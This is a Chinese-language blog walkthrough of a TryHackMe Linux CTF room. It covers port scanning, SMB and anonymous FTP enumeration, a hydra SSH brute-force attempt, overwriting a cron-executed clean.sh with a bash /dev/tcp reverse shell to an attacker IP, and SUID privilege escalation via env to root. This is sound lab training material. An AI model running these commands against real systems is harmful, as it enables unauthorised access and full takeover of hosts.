^-^
Anonymous
  1. port scan
  2. ftp
  3. clean.sh
  4. reverse_shell
  5. user.txt
  6. privesc
  7. root.txt

port scan

先用rustscan扫描端口

1
rustscan -a 10.10.54.189 -r 1-65535

image-20230717210603849

然后使用smbclient看一下有没有smbshare

1
smbclient -L //10.10.54.189/

image-20230717211011877

发现了个pics共享

连接进去后是两张柯基的照片

image-20230717211123354

image-20230717211054188

猜测用户名为pics

用hydra爆破

1
hydra -l pics -P rockyou.txt ssh://10.10.54.189 -t 4

发现爆破不出来

ftp

再去看看ftp

1
nmap 10.10.54.189 -A -p 21

image-20230717211923958

可以匿名登录

image-20230717212039071

clean.sh

发现三个文件,且clean.sh的权限是rwx

clean.sh

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

他可能是会自动执行这个脚本,测试一下

reverse_shell

修改clean.sh文件内容

1
2
#!/bin/bash
echo `ls` > /var/ftp/scripts/removed_files.log

然后再用put clean.sh上传

image-20230717212838515

可以发现log文件更新了

下载发现,内容为执行命令ls的结果

image-20230717212909502

所以可以弹shell

1
2
#!/bin/bash
bash -i >& /dev/tcp/10.11.35.4/9999 0>&1

开启监听上传,获得shell

image-20230717213129643

user.txt

获得user.txt

image-20230717213149648

然后进行提权,寻找有suid位的可执行文件find / -user root -perm -4000 -print 2>/dev/null

image-20230717213350155

privesc

发现了env

使用env /bin/sh -p进行提权

image-20230717213528054

root.txt

获得root.txt

image-20230717213550514

2024-03-01 该篇文章被 v2ish1yan 打上标签: Linux 归为分类: Tryhackme

© 1949-2024 China
🌊面朝大海,春暖花开🌸 本站由Hexo驱动|使用Hexo-theme-A4主题